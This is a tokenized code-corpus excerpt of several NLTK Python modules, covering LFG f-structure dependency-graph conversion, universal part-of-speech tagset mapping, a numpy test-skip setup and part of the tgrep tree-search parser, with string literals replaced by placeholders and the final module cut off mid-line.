'<STR_LIT>' : head , <EOL> '<STR_LIT>' : rel , <EOL> } <EOL> ) <EOL> for feature in sorted ( self ) : <EOL> for item in sorted ( self [ feature ] ) : <EOL> if isinstance ( item , FStructure ) : <EOL> item . _to_depgraph ( nodes , index , feature ) <EOL> elif isinstance ( item , tuple ) : <EOL> new_index = len ( nodes ) <EOL> nodes [ new_index ] . update ( <EOL> { <EOL> '<STR_LIT:address>' : new_index , <EOL> '<STR_LIT>' : item [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : item [ <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : index , <EOL> '<STR_LIT>' : feature , <EOL> } <EOL> ) <EOL> elif isinstance ( item , list ) : <EOL> for n in item : <EOL> n . _to_depgraph ( nodes , index , feature ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % feature ) <EOL> @ staticmethod <EOL> def read_depgraph ( depgraph ) : <EOL> return FStructure . _read_depgraph ( depgraph . root , depgraph ) <EOL> @ staticmethod <EOL> def _read_depgraph ( node , depgraph , label_counter = None , parent = None ) : <EOL> if not label_counter : <EOL> label_counter = Counter ( ) <EOL> if node [ '<STR_LIT>' ] . lower ( ) in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return ( node [ '<STR_LIT>' ] , node [ '<STR_LIT>' ] ) <EOL> else : <EOL> fstruct = FStructure ( ) <EOL> fstruct . pred = None <EOL> fstruct . label = FStructure . _make_label ( label_counter . get ( ) ) <EOL> fstruct . parent = parent <EOL> word , tag = node [ '<STR_LIT>' ] , node [ '<STR_LIT>' ] <EOL> if tag [ : <NUM_LIT:2> ] == '<STR_LIT>' : <EOL> if tag [ <NUM_LIT:2> : <NUM_LIT:3> ] == '<STR_LIT:D>' : <EOL> fstruct . safeappend ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> fstruct . pred = ( word , tag [ : <NUM_LIT:2> ] ) <EOL> if not fstruct . pred : <EOL> fstruct . pred = ( word , tag ) <EOL> children = [ depgraph . nodes [ idx ] for idx in sum ( list ( node [ '<STR_LIT>' ] . values ( ) ) , [ ] ) ] <EOL> for child in children : <EOL> fstruct . safeappend ( child [ '<STR_LIT>' ] , FStructure . _read_depgraph ( child , depgraph , label_counter , fstruct ) ) <EOL> return fstruct <EOL> @ staticmethod <EOL> def _make_label ( value ) : <EOL> """<STR_LIT>""" <EOL> letter = [ '<STR_LIT:f>' , '<STR_LIT:g>' , '<STR_LIT:h>' , '<STR_LIT:i>' , '<STR_LIT>' , '<STR_LIT:k>' , '<STR_LIT:l>' , '<STR_LIT:m>' , '<STR_LIT:n>' , '<STR_LIT:o>' , '<STR_LIT:p>' , '<STR_LIT:q>' , '<STR_LIT:r>' , '<STR_LIT:s>' , <EOL> '<STR_LIT:t>' , '<STR_LIT:u>' , '<STR_LIT:v>' , '<STR_LIT:w>' , '<STR_LIT:x>' , '<STR_LIT:y>' , '<STR_LIT:z>' , '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT:d>' , '<STR_LIT:e>' ] [ value - <NUM_LIT:1> ] <EOL> num = int ( value ) // <NUM_LIT> <EOL> if num > <NUM_LIT:0> : <EOL> return letter + str ( num ) <EOL> else : <EOL> return letter <EOL> def __repr__ ( self ) : <EOL> return self . __unicode__ ( ) . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> def __str__ ( self ) : <EOL> return self . pretty_format ( ) <EOL> def pretty_format ( self , indent = <NUM_LIT:3> ) : <EOL> try : <EOL> accum = '<STR_LIT>' % self . label <EOL> except NameError : <EOL> accum = '<STR_LIT:[>' <EOL> try : <EOL> accum += '<STR_LIT>' % ( self . pred [ <NUM_LIT:0> ] ) <EOL> except NameError : <EOL> pass <EOL> for feature in sorted ( self ) : <EOL> for item in self [ feature ] : <EOL> if isinstance ( item , FStructure ) : <EOL> next_indent = indent + len ( feature ) + <NUM_LIT:3> + len ( self . label ) <EOL> accum += '<STR_LIT>' % ( '<STR_LIT:U+0020>' * ( indent ) , feature , item . pretty_format ( next_indent ) ) <EOL> elif isinstance ( item , tuple ) : <EOL> accum += '<STR_LIT>' % ( '<STR_LIT:U+0020>' * ( indent ) , feature , item [ <NUM_LIT:0> ] ) <EOL> elif isinstance ( item , list ) : <EOL> accum += '<STR_LIT>' % ( '<STR_LIT:U+0020>' * ( indent ) , feature , ( '<STR_LIT>' % ( '<STR_LIT:U+0020>' * ( indent + len ( feature ) + <NUM_LIT:2> ) ) ) . join ( item ) ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % feature ) <EOL> return accum + '<STR_LIT:]>' <EOL> def demo_read_depgraph ( ) : <EOL> from nltk . parse . dependencygraph import DependencyGraph <EOL> dg1 = DependencyGraph ( """<STR_LIT>""" ) <EOL> dg2 = DependencyGraph ( """<STR_LIT>""" ) <EOL> dg3 = DependencyGraph ( """<STR_LIT>""" ) <EOL> dg4 = DependencyGraph ( """<STR_LIT>""" ) <EOL> depgraphs = [ dg1 , dg2 , dg3 , dg4 ] <EOL> for dg in depgraphs : <EOL> print ( FStructure . read_depgraph ( dg ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> demo_read_depgraph ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , unicode_literals , division <EOL> from collections import defaultdict <EOL> from os . path import join <EOL> from nltk . data import load <EOL> _UNIVERSAL_DATA = "<STR_LIT>" <EOL> _UNIVERSAL_TAGS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:X>' , '<STR_LIT:.>' ) <EOL> _MAPPINGS = defaultdict ( lambda : defaultdict ( lambda : defaultdict ( lambda : '<STR_LIT>' ) ) ) <EOL> def _load_universal_map ( fileid ) : <EOL> contents = load ( join ( _UNIVERSAL_DATA , fileid + '<STR_LIT>' ) , format = "<STR_LIT:text>" ) <EOL> _MAPPINGS [ fileid ] [ '<STR_LIT>' ] . default_factory = lambda : '<STR_LIT:X>' <EOL> for line in contents . splitlines ( ) : <EOL> line = line . strip ( ) <EOL> if line == '<STR_LIT>' : <EOL> continue <EOL> fine , coarse = line . split ( '<STR_LIT:\t>' ) <EOL> assert coarse in _UNIVERSAL_TAGS , '<STR_LIT>' . format ( coarse ) <EOL> assert fine not in _MAPPINGS [ fileid ] [ '<STR_LIT>' ] , '<STR_LIT>' . format ( fine ) <EOL> _MAPPINGS [ fileid ] [ '<STR_LIT>' ] [ fine ] = coarse <EOL> def tagset_mapping ( source , target ) : <EOL> """<STR_LIT>""" <EOL> if source not in _MAPPINGS or target not in _MAPPINGS [ source ] : <EOL> if target == '<STR_LIT>' : <EOL> _load_universal_map ( source ) <EOL> return _MAPPINGS [ source ] [ target ] <EOL> def map_tag ( source , target , source_tag ) : <EOL> """<STR_LIT>""" <EOL> if target == '<STR_LIT>' : <EOL> if source == '<STR_LIT>' : <EOL> source = '<STR_LIT>' <EOL> if source == '<STR_LIT>' : <EOL> source = '<STR_LIT>' <EOL> return tagset_mapping ( source , target ) [ source_tag ] </s>
<s> from __future__ import absolute_import <EOL> def setup_module ( module ) : <EOL> from nose import SkipTest <EOL> try : <EOL> import numpy <EOL> except ImportError : <EOL> raise SkipTest ( "<STR_LIT>" ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import , print_function , unicode_literals <EOL> from nltk . compat import binary_type , text_type <EOL> import functools <EOL> import nltk . tree <EOL> try : <EOL> import pyparsing <EOL> except ImportError : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> import re <EOL> class TgrepException ( Exception ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> def ancestors ( node ) : <EOL> '''<STR_LIT>''' <EOL> results = [ ] <EOL> try : <EOL> current = node . parent ( ) <EOL> except AttributeError : <EOL> return results <EOL> while current : <EOL> results . append ( current ) <EOL> current = current . parent ( ) <EOL> return results <EOL> def unique_ancestors ( node ) : <EOL> '''<STR_LIT>''' <EOL> results = [ ] <EOL> try : <EOL> current = node . parent ( ) <EOL> except AttributeError : <EOL> return results <EOL> while current and len ( current ) == <NUM_LIT:1> : <EOL> results . append ( current ) <EOL> current = current . parent ( ) <EOL> return results <EOL> def _descendants ( node ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> treepos = node . treepositions ( ) <EOL> except AttributeError : <EOL> return [ ] <EOL> return [ node [ x ] for x in treepos [ <NUM_LIT:1> : ] ] <EOL> def _leftmost_descendants ( node ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> treepos = node . treepositions ( ) <EOL> except AttributeError : <EOL> return [ ] <EOL> return [ node [ x ] for x in treepos [ <NUM_LIT:1> : ] if all ( y == <NUM_LIT:0> for y in x ) ] <EOL> def _rightmost_descendants ( node ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> rightmost_leaf = max ( node . treepositions ( ) ) <EOL> except AttributeError : <EOL> return [ ] <EOL> return [ node [ rightmost_leaf [ : i ] ] for i in range ( <NUM_LIT:1> , len ( rightmost_leaf ) + <NUM_LIT:1> ) ] <EOL> def _istree ( obj ) : <EOL> '''<STR_LIT>''' <EOL> return isinstance ( obj , nltk . tree . Tree ) <EOL> def _unique_descendants ( node ) : <EOL> '''<STR_LIT>''' <EOL> results = [ ] <EOL> current = node <EOL> while current and _istree ( current ) and len ( current ) == <NUM_LIT:1> : <EOL> current = current [ <NUM_LIT:0> ] <EOL> results . append ( current ) <EOL> return results <EOL> def _before ( node ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> pos = node . treeposition ( ) <EOL> tree = node . root ( ) <EOL> except AttributeError : <EOL> return [ ] <EOL> return [ tree [ x ] for x in tree . treepositions ( ) <EOL> if x [ : len ( pos ) ] < pos [ : len ( x ) ] ] <EOL> def _immediately_before ( node ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> pos = node . treeposition ( ) <EOL> tree = node . root ( ) <EOL> except AttributeError : <EOL> return [ ] <EOL> idx = len ( pos ) - <NUM_LIT:1> <EOL> while <NUM_LIT:0> <= idx and pos [ idx ] == <NUM_LIT:0> : <EOL> idx -= <NUM_LIT:1> <EOL> if idx < <NUM_LIT:0> : <EOL> return [ ] <EOL> pos = list ( pos [ : idx + <NUM_LIT:1> ] ) <EOL> pos [ - <NUM_LIT:1> ] -= <NUM_LIT:1> <EOL> before = tree [ pos ] <EOL> return [ before ] + _rightmost_descendants ( before ) <EOL> def _after ( node ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> pos = node . treeposition ( ) <EOL> tree = node . root ( ) <EOL> except AttributeError : <EOL> return [ ] <EOL> return [ tree [ x ] for x in tree . treepositions ( ) <EOL> if x [ : len ( pos ) ] > pos [ : len ( x ) ] ] <EOL> def _immediately_after ( node ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> pos = node . treeposition ( ) <EOL> tree = node . root ( ) <EOL> current = node . parent ( ) <EOL> except AttributeError : <EOL> return [ ] <EOL> idx = len ( pos ) - <NUM_LIT:1> <EOL> while <NUM_LIT:0> <= idx and pos [ idx ] == len ( current ) - <NUM_LIT:1> : <EOL> idx -= <NUM_LIT:1> <EOL> current = current . parent ( ) <EOL> if idx < <NUM_LIT:0> : <EOL> return [ ] <EOL> pos = list ( pos [ : idx + <NUM_LIT:1> ] ) <EOL> pos [ - <NUM_LIT:1> ] += <NUM_LIT:1> <EOL> after = tree [ pos ] <EOL> return [ after ] + _leftmost_descendants ( after ) <EOL> def _tgrep_node_literal_value ( node ) : <EOL> '''<STR_LIT>''' <EOL> return ( node . label ( ) if _istree ( node ) else text_type ( node ) ) <EOL> def _tgrep_macro_use_action ( _s , _l , tokens ) : <EOL> '''<STR_LIT>''' <EOL> assert len ( tokens ) == <NUM_LIT:1> <EOL> assert tokens [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] == '<STR_LIT:@>' <EOL> macro_name = tokens [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] <EOL> def macro_use ( n , m = None , l = None ) : <EOL> if m is None or macro_name not in m : <EOL> raise TgrepException ( '<STR_LIT>' . format ( macro_name ) ) <EOL> return m [ macro_name ] ( n , m , l ) <EOL> return macro_use <EOL> def _tgrep_node_action ( _s , _l , tokens ) : <EOL> '''<STR_LIT>''' <EOL> if tokens [ <NUM_LIT:0> ] == "<STR_LIT:'>" : <EOL> tokens = tokens [ <NUM_LIT:1> : ] <EOL> if len ( tokens ) > <NUM_LIT:1> : <EOL> assert list ( set ( tokens [ <NUM_LIT:1> : : <NUM_LIT:2> ] ) ) == [ '<STR_LIT:|>' ] <EOL> tokens = [ _tgrep_node_action ( None , None , [ node ] ) <EOL> for node in tokens [ : : <NUM_LIT:2> ] ] <EOL> return ( lambda t : lambda n , m = None , l = None : any ( f ( n , m , l ) for f in t ) ) ( tokens ) <EOL> else : <EOL> if hasattr ( tokens [ <NUM_LIT:0> ] , '<STR_LIT>' ) : <EOL> return tokens [ <NUM_LIT:0> ] <EOL> elif tokens [ <NUM_LIT:0> ] == '<STR_LIT:*>' or tokens [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> return lambda n , m = None , l = None : True <EOL> elif tokens [ <NUM_LIT:0> ] . startswith ( '<STR_LIT:">' ) : <EOL> assert tokens [ <NUM_LIT:0> ] . endswith ( '<STR_LIT:">' ) <EOL> node_lit = tokens [ <NUM_LIT:0> ] [ <NUM_LIT:1> : - <NUM_LIT:1> ] . replace ( '<STR_LIT>' , '<STR_LIT:">' ) . replace ( '<STR_LIT>' , '<STR_LIT:\\>' ) <EOL> return ( lambda s : lambda n , m = None , l = None : _tgrep_node_literal_value ( n ) == s ) ( node_lit ) <EOL> elif tokens [ <NUM_LIT:0> ] . startswith ( '<STR_LIT:/>' ) : <EOL> assert tokens [ <NUM_LIT:0> ] . endswith ( '<STR_LIT:/>' ) <EOL> node_lit = tokens [ <NUM_LIT:0> ] [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> return ( lambda r : lambda n , m = None , l = None : <EOL> r . search ( _tgrep_node_literal_value ( n ) ) ) ( re . compile ( node_lit ) ) <EOL> elif tokens [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) : <EOL> node_func = _tgrep_node_action ( _s , _l , [ tokens [ <NUM_LIT:0> ] [ <NUM_LIT:2> : ] . lower ( ) ] ) <EOL> return ( lambda f : lambda n , m = None , l = None : <EOL> f ( _tgrep_node_literal_value ( n ) . lower ( ) ) ) ( node_func ) <EOL> else : <EOL> return ( lambda s : lambda n , m = None , l = None : <EOL> _tgrep_node_literal_value ( n ) == s ) ( tokens [ <NUM_LIT:0> ] ) <EOL> def _tgrep_parens_action ( _s , _l , tokens ) : <EOL> '''<STR_LIT>''' <EOL> assert len ( tokens ) == <NUM_LIT:3> <EOL> assert tokens [ <NUM_LIT:0> ] == '<STR_LIT:(>' <EOL> assert tokens [ <NUM_LIT:2> ] == '<STR_LIT:)>' <EOL> return tokens [ <NUM_LIT:1> ] <EOL> def _tgrep_nltk_tree_pos_action ( _s , _l , tokens ) : <EOL> '''<STR_LIT>''' <EOL> node_tree_position = tuple ( int ( x ) for x in tokens if x . isdigit ( ) ) <EOL> return ( lambda i : lambda n , m = None , l = None : ( hasattr ( n , '<STR_LIT>' ) and <EOL> n . treeposition ( ) == i ) ) ( node_tree_position ) <EOL> def _tgrep_relation_action ( _s , _l , tokens ) : <EOL> '''<STR_LIT>''' <EOL> negated = False <EOL> if tokens [ <NUM_LIT:0> ] == '<STR_LIT:!>' : <EOL> negated = True <EOL> tokens = tokens [ <NUM_LIT:1> : ] <EOL> if tokens [ <NUM_LIT:0> ] == '<STR_LIT:[>' : <EOL> assert len ( tokens ) == <NUM_LIT:3> <EOL> assert tokens [ <NUM_LIT:2> ] == '<STR_LIT:]>' <EOL> retval = tokens [ <NUM_LIT:1> ] <EOL> else : <EOL> assert len ( tokens ) == <NUM_LIT:2> <EOL> operator , predicate = tokens <EOL> if operator == '<STR_LIT:<>' : <EOL> retval = lambda n , m = None , l = None : ( _istree ( n ) and <EOL> any ( predicate ( x , m , l ) for x in n ) ) <EOL> elif operator == '<STR_LIT:>>' : <EOL> retval = lambda n , m = None , l = None : ( hasattr ( n , '<STR_LIT>' ) and <EOL> bool ( n . parent ( ) ) and <EOL> predicate ( n . parent ( ) , m , l ) ) <EOL> elif operator == '<STR_LIT>' or operator == '<STR_LIT>' : <EOL> retval = lambda n , m = None , l = None : ( _istree ( n ) and <EOL> bool ( list ( n ) ) and <EOL> predicate ( n [ <NUM_LIT:0> ] , m , l ) ) <EOL> elif operator == '<STR_LIT>' or operator == '<STR_LIT>' : <EOL> retval = lambda n , m = None , l = None : ( hasattr ( n , '<STR_LIT>' ) and <EOL> bool ( n . parent ( ) ) and <EOL> ( n is n . parent ( ) [ <NUM_LIT:0> ] ) and <EOL> predicate ( n . parent ( ) , m , l ) ) <EOL> elif operator [ <NUM_LIT:0> ] == '<STR_LIT:<>' and operator [ <NUM_LIT:1> : ] . isdigit ( ) : <EOL> idx = int ( operator [ <NUM_LIT:1> : ] ) <EOL> retval = ( lambda i : lambda n , m = None , l = None : ( _istree ( n ) and <EOL> bool ( list ( n ) ) and <EOL> <NUM_LIT:0> <= i < len ( n ) and <EOL> predicate ( n [ i ] , m , l ) ) ) ( idx - <NUM_LIT:1> ) <EOL> elif operator [ <NUM_LIT:0> ] == '<STR_LIT:>>' and operator [ <NUM_LIT:1> : ] . isdigit ( ) : <EOL> idx = int ( operator [ <NUM_LIT:1> : ] ) <EOL> retval = ( lambda i : lambda n , m = None , l = None : ( hasattr ( n , '<STR_LIT>' ) and <EOL> bool ( n . parent ( ) ) and <EOL> <NUM_LIT:0> <= i < len ( n . parent ( ) ) and <EOL> ( n is n . parent ( ) [ i ] ) and <EOL> predicate ( n . parent ( ) , m , l ) ) ) ( idx - <NUM_LIT:1> ) <EOL> elif operator == '<STR_LIT>' or operator == '<STR_LIT>' or operator == '<STR_LIT>' : <EOL> retval = lambda n , m = None , l = None : ( _istree ( n ) and bool ( list ( n ) ) <EOL> and predicate ( n [ - <NUM_LIT:1> ] , m , l ) ) <EOL> elif operator == '<STR_LIT>' or operator == '<STR_LIT>' or operator == '<STR_LIT>' : <EOL> retval = lambda n , m = None , l = None : ( hasattr ( n , '<STR_LIT>' ) and <EOL> bool ( n . parent ( ) ) and <EOL> ( n is n . parent ( ) [ - <NUM_LIT:1> ] ) and <EOL> predicate ( n . parent ( ) , m , l ) ) <EOL> elif operator [ : <NUM_LIT:2> ] == '<STR_LIT>' and operator [ <NUM_LIT:2> : ] . isdigit ( ) : <EOL> idx = - int ( operator [ <NUM_LIT:2> : ] ) <EOL> retval = ( lambda i : lambda n , m = None , l = None : ( _istree ( n ) and <EOL> bool ( list ( n ) ) and <EOL> <NUM_LIT:0> <= ( i + len ( n ) ) < len ( n ) and <EOL> predicate ( n [ i + len ( n ) ] , m , l ) ) ) ( idx ) <EOL> elif operator [ : <NUM_LIT:2> ] == '<STR_LIT>' and operator [ <NUM_LIT:2> : ] . isdigit ( ) : <EOL> idx = - int ( operator [ <NUM_LIT:2> : ] ) <EOL> retval = ( lambda i : lambda n , m = None , l = None : <EOL> ( hasattr ( n , '<STR_LIT>' ) and <EOL> bool ( n . parent ( ) ) and <EOL> <NUM_LIT:0> <= ( i + len ( n . parent ( ) ) ) < len ( n . parent ( ) ) and <EOL> ( n is n . parent ( ) [ i + len ( n . parent ( ) ) ] ) and <EOL> predicate ( n . parent ( ) , m , l ) ) ) ( idx ) <EOL> elif operator == '<STR_LIT>' : <EOL> retval = lambda n , m = None , l = None : ( _istree ( n ) and <EOL> len ( n ) == <NUM_LIT:1> and <EOL> predicate ( n [ <NUM_LIT:0> ] , m , l ) ) <EOL> elif operator == '<STR_LIT>' : <EOL> retval = lambda n , m = None , l = None : ( hasattr ( n , '<STR_LIT>' ) and <EOL> bool ( n . parent ( ) ) and <EOL> len ( n . parent ( ) ) == <NUM_LIT:1> and <EOL> predicate ( n . parent ( ) , m , l ) ) <EOL> elif operator == '<STR_LIT>' : <EOL> retval = lambda n , m = None , l = None : ( _istree ( n ) and <EOL> any ( predicate ( x , m , l ) for x in _descendants ( n ) ) ) <EOL> elif operator == '<STR_LIT>' : <EOL> retval = lambda n , m = None , l = None : any ( predicate ( x , m , l ) for x in ancestors ( n ) ) <EOL> elif operator == '<STR_LIT>' or operator == '<STR_LIT>' : <EOL> retval = lambda n , m = None , l = None : ( _istree ( n ) and <EOL> any ( predicate ( x , m , l ) <EOL> for x in _leftmost_descendants ( n ) ) ) <EOL> elif operator == '<STR_LIT>' : <EOL> retval = lambda n , m = None , l = None : any ( ( predicate ( x , m , l ) and <EOL> n in _leftmost_descendants ( x ) ) <EOL> for x in ancestors ( n ) ) <EOL> elif operator == '<STR_LIT>' : <EOL> retval = lambda n , m = None , l = None : ( _istree ( n ) and <EOL> any ( predicate ( x , m , l ) <EOL> for x in _rightmost_descendants ( n ) ) ) <EOL> elif operator == '<STR_LIT>' : <EOL> retval = lambda n , m = None , l = None : any ( ( predicate ( x , m , l ) and <EOL> n in _rightmost_descendants ( x ) ) <EOL> for x in ancestors ( n ) ) <EOL> elif operator == '<STR_LIT>' : <EOL> retval = lambda n , m = None , l = None : ( _istree ( n ) and <EOL> any ( predicate ( x , m , l ) <EOL> for x in _unique_descendants ( n ) ) ) <EOL> elif operator == '<STR_LIT>' : <EOL> retval = lambda n , m = None , l = None : any ( predicate ( x , m , l ) for x in unique_ancestors ( n ) ) <EOL> elif operator == '<STR_LIT:.>' : <EOL> retval = lambda n , m = None , l = None : any ( predicate ( x , m , l ) <EOL> for x in _immediately_after ( n ) ) <EOL> elif operator == '<STR_LIT:U+002C>' : <EOL> retval = lambda n , m = None , l = None : any ( predicate ( x , m , l ) <EOL> for x in _immediately_before ( n ) ) <EOL> elif operator == '<STR_LIT:..>' : <EOL> retval = lambda n , m = None , l = None : any ( predicate ( x , m , l ) for x in _after ( n ) ) <EOL> elif operator == '<STR_LIT>' : <EOL> retval = lambda n , m = None , l = None : any ( predicate ( x , m , l ) for x in _before ( n ) ) <EOL> elif operator == '<STR_LIT:$>' or operator == '<STR_LIT:%>' : <EOL> retval = lambda n , m = None , l = None : ( hasattr ( n , '<STR_LIT>' ) and <EOL> bool ( n . parent ( ) ) and <EOL> any ( predicate ( x , m , l ) <EOL> for x in n . parent ( ) if x is not n ) ) <EOL> elif operator == '<STR_LIT>' or operator == '<STR_LIT>' : <EOL> retval = lambda n , m = None , l = None : ( hasattr ( n , '<STR_LIT>' ) and <EOL> bool ( n . right_sibling ( ) ) and <EOL> predicate ( n . right_sibling ( ) , m , l ) ) <EOL> elif operator == '<STR_LIT>' or operator == '<STR_LIT>' : <EOL> retval = lambda n , m = None , l = None : ( hasattr ( n , '<STR_LIT>' ) and <EOL> bool ( n . left_sibling ( ) ) and <EOL> predicate ( n . left_sibling ( ) , m , l ) ) <EOL> elif operator == '<STR_LIT>' or operator == '<STR_LIT>' : <EOL> retval = lambda n , m = None , l = None : ( hasattr ( n , '<STR_LIT>' ) and <EOL> hasattr ( n , '<STR_LIT>' ) and <EOL> bool ( n . parent ( ) ) and <EOL> any ( predicate ( x , m , l ) for x in <EOL> n . parent ( ) [ n . parent_index ( ) + <NUM_LIT:1> : ] ) ) <EOL> elif operator == '<STR_LIT>' or operator == '<STR_LIT>' : <EOL> retval = lambda n , m = None , l = None : ( hasattr ( n , '<STR_LIT>' ) and <EOL> hasattr ( n , '<STR_LIT>' ) and <EOL> bool ( n . parent ( ) ) and <EOL> any ( predicate ( x , m , l ) for x in <EOL> n . parent ( ) [ : n . parent_index ( ) ] ) ) <EOL> else : <EOL> raise TgrepException ( <EOL> '<STR_LIT>' . format ( operator ) ) <EOL> if negated : <EOL> return ( lambda r : ( lambda n , m = None , l = None : not r ( n , m , l ) ) ) ( retval ) <EOL> else : <EOL> return retval <EOL> def _tgrep_conjunction_action ( _s , _l , tokens , join_char = '<STR_LIT:&>' ) : <EOL> '''<STR_LIT>''' <EOL> tokens = [ x for x in tokens if x != join_char ] <EOL> if len ( tokens ) == <NUM_LIT:1> : <EOL> return tokens [ <NUM_LIT:0> ] <EOL> else : <EOL> return ( lambda ts : lambda n , m = None , l = None : all ( predicate ( n , m , l ) <EOL> for predicate in ts ) ) ( tokens ) <EOL> def _tgrep_segmented_pattern_action ( _s , _l , tokens ) : <EOL> '''<STR_LIT>''' <EOL> node_label = tokens [ <NUM_LIT:0> ] <EOL> reln_preds = tokens [ <NUM_LIT:1> : ] <EOL> def pattern_segment_pred ( n , m = None , l = None ) : <EOL> '''<STR_LIT>''' <EOL> if l is None or node_label not in l : <EOL> raise TgrepException ( '<STR_LIT>' . format ( <EOL> node_label ) ) <EOL> node = l [ node_label ] <EOL> return all ( pred ( node , m , l ) for pred in reln_preds ) <EOL> return pattern_segment_pred <EOL> def _tgrep_node_label_use_action ( _s , _l , tokens ) : <EOL> '''<STR_LIT>''' <EOL> assert len ( tokens ) == <NUM_LIT:1> <EOL> assert tokens [ <NUM_LIT:0> ] . startswith ( '<STR_LIT:=>' ) <EOL> return tokens [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] <EOL> def _tgrep_node_label_pred_use_action ( _s , _l , tokens ) : <EOL> '''<STR_LIT>''' <EOL> assert len ( tokens ) == <NUM_LIT:1> <EOL> assert tokens [ <NUM_LIT:0> ] . startswith ( '<STR_LIT:=>' ) <EOL> node_label = tokens [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] <EOL> def node_label_use_pred ( n , m = None , l = None ) : <EOL> if l is None or node_label not in l : <EOL> raise TgrepException ( '<STR_LIT>' . format ( <EOL> node_label ) ) <EOL> node = l [ node_label ] <EOL> return n is node <EOL> return node_label_use_pred <EOL> def _tgrep_bind_node_label_action ( _s , _l , tokens ) : <EOL> '''<STR_LIT>''' <EOL> if len ( tokens ) == <NUM_LIT:1> : <EOL> return tokens [ <NUM_LIT:0> ] <EOL> else : <EOL> assert len ( tokens ) == <NUM_LIT:3> <EOL> assert tokens [ <NUM_LIT:1> ] == '<STR_LIT:=>' <EOL> node_pred = tokens [ <NUM_LIT:0> ] <EOL> node_label = tokens [ <NUM_LIT:2> ] <EOL> def node_label_bind_pred ( n , m = None , l = None ) : <EOL> if node_pred ( n , m , l ) : <EOL> if l is None : <EOL> raise TgrepException ( <EOL> '<STR_LIT>' . format ( <EOL> node_label ) ) <EOL> l [ node_label ] = n <EOL> return True <EOL> else : <EOL> return False <EOL> return node_label_bind_pred <EOL> def _tgrep_rel_disjunction_action ( _s , _l , tokens ) : <EOL> '''<STR_LIT>''' <EOL> tokens = [ x for x in tokens if x != '<STR_LIT:|>' ] <EOL> if len ( tokens ) == <NUM_LIT:1> : <EOL> return tokens [ <NUM_LIT:0> ] <EOL> elif len ( tokens ) == <NUM_LIT:2> : <EOL> return ( lambda a , b : lambda n , m = None , l = None : <EOL> a ( n , m , l ) or b ( n , m , l ) ) ( tokens [ <NUM_LIT:0> ] , tokens [ <NUM_LIT:1> ] ) <EOL> def _macro_defn_action ( _s , _l , tokens ) : <EOL> '''<STR_LIT>''' <EOL> assert len ( tokens ) == <NUM_LIT:3> <EOL> assert tokens [ <NUM_LIT:0> ] == '<STR_LIT:@>' <EOL> return { tokens [ <NUM_LIT:1> ] : tokens [ <NUM_LIT:2> ] } <EOL> def _tgrep_exprs_action ( _s , _l , tokens ) : <EOL> '''<STR_LIT>''' <EOL> if len ( tokens ) == <NUM_LIT:1> : <EOL> return lambda n , m = None , l = None : tokens [ <NUM_LIT:0> ] ( n , None , { } ) <EOL> tokens = [ x for x in tokens if x != '<STR_LIT:;>' ] <EOL> macro_dict = { } <EOL> macro_defs = [ tok for tok in tokens if isinstance ( tok , dict ) ] <EOL> for macro_def in macro_defs : <EOL> macro_dict . update ( macro_def ) <EOL> tgrep_exprs = [ tok for tok in tokens if not isinstance ( tok , dict ) ] <EOL> def top_level_pred ( n , m = macro_dict , l = None ) : <EOL> label_dict = { } <EOL> return any ( predicate ( n , m , label_dict ) for predicate in tgrep_exprs ) <EOL> return top_level_pred <EOL> def _build_tgrep_parser ( set_parse_actions = True ) : <EOL> '''<STR_LIT>''' <EOL> tgrep_op = ( pyparsing . Optional ( '<STR_LIT:!>' ) + <EOL> pyparsing . Regex ( '<STR_LIT>' ) ) <EOL> tgrep_qstring = pyparsing . QuotedString ( quoteChar = '<STR_LIT:">' , escChar = '<STR_LIT:\\>' , <EOL> unquoteResults = False ) <EOL> tgrep_node_regex = pyparsing . QuotedString ( quoteChar = '<STR_LIT:/>' , escChar = '<STR_LIT:\\>' , <EOL> unquoteResults = False ) <EOL> tgrep_qstring_icase = pyparsing . Regex ( <EOL> '<STR_LIT>' ) <EOL> tgrep_node_regex_icase = pyparsing . Regex ( <EOL> '<STR_LIT>' ) <EOL> tgrep_node_literal = pyparsing . Regex ( '<STR_LIT>' ) <EOL> tgrep_expr = pyparsing . Forward ( ) <EOL> tgrep_relations = pyparsing . Forward ( ) <EOL> tgrep_parens = pyparsing . Literal ( '<STR_LIT:(>' ) + tgrep_expr + '<STR_LIT:)>' <EOL> tgrep_nltk_tree_pos = ( <EOL> pyparsing . Literal ( '<STR_LIT>' ) + <EOL> pyparsing . Optional ( pyparsing . Word ( pyparsing . nums ) + '<STR_LIT:U+002C>' + <EOL> pyparsing . Optional ( pyparsing . delimitedList ( <EOL> pyparsing . Word ( pyparsing . nums ) , delim = '<STR_LIT:U+002C>' ) + <EOL> pyparsing . Optional ( '<STR_LIT:U+002C>' ) ) ) + '<STR_LIT:)>' ) <EOL> tgrep_node_label = 